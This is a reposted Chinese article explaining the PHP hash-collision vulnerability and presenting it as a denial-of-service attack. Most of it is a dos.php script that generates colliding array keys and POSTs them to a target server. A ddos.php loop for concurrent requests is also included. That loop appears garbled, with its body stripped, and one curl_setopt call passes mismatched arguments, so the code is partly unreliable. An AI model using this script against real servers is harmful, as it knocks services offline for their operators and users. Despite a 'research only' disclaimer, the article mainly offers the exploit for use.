PHP利用hash冲突漏洞进行DDoS攻击的方法分析

前端之家收集整理的这篇文章主要介绍了PHP利用hash冲突漏洞进行DDoS攻击的方法分析前端之家小编觉得挺不错的,现在分享给大家,也给大家做个参考。

本文实例分析了PHP利用hash冲突漏洞进行DDoS攻击的方法分享给大家供大家参考。具体分析如下:

首先声明:

本文内容只用于研究学习使用,请勿用于非法行为!

前面提到过最近爆出的hash表碰撞漏洞,包括java、python、PHP等在内的很多常用语言均未幸免,今晚咱就来实际看看它的威力。

攻击原理:

通过向目标服务器post一组精心拼凑的数组参数,到达服务端后语言底层处理接收到的数组参数时,由于该漏洞的存在造成cpu的大量消耗,最终导致服务器资源耗尽。 不用什么花哨的手法,就用PHP简单实现下看下效果,点到即止。

文件:dos.PHP

PHP;"> // 目标地址 // 只要目标地址存在,不用管它是干嘛的 $host = 'http://127.0.0.1/test.PHP'; $data = ''; $size = pow(2,15); for ($key=0,$max=($size-1)*$size; $key<=$max; $key+=$size) { $data .= '&array[' . $key . ']=0'; } $ret = curl($host,ltrim($data,'&')); var_dump($ret); function curl($url,$post,$timeout = 30){ $ch = curl_init(); curl_setopt($ch,CURLOPT_RETURNTRANSFER,true); curl_setopt($ch,CURLOPT_TIMEOUT,$timeout); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout - 5); curl_setopt($ch,CURLOPT_HTTPHEADER,array('Expect:')); curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_POST,CURLOPT_POSTFIELDS,$post); $output = curl_exec($ch); if ($output === false) return false; $info = curl_getinfo($ch); $http_code = $info['http_code']; if ($http_code == 404) return false; curl_close($ch); return $output; }

文件:ddos.PHP

PHP;"> DDOS PHP for($i=0; $i<5; $i++){//并发数 echo ''; } ?>

希望本文所述对大家的PHP程序设计有所帮助。

原文链接:https://www.f2er.com/php/22278.html

猜你在找的PHP相关文章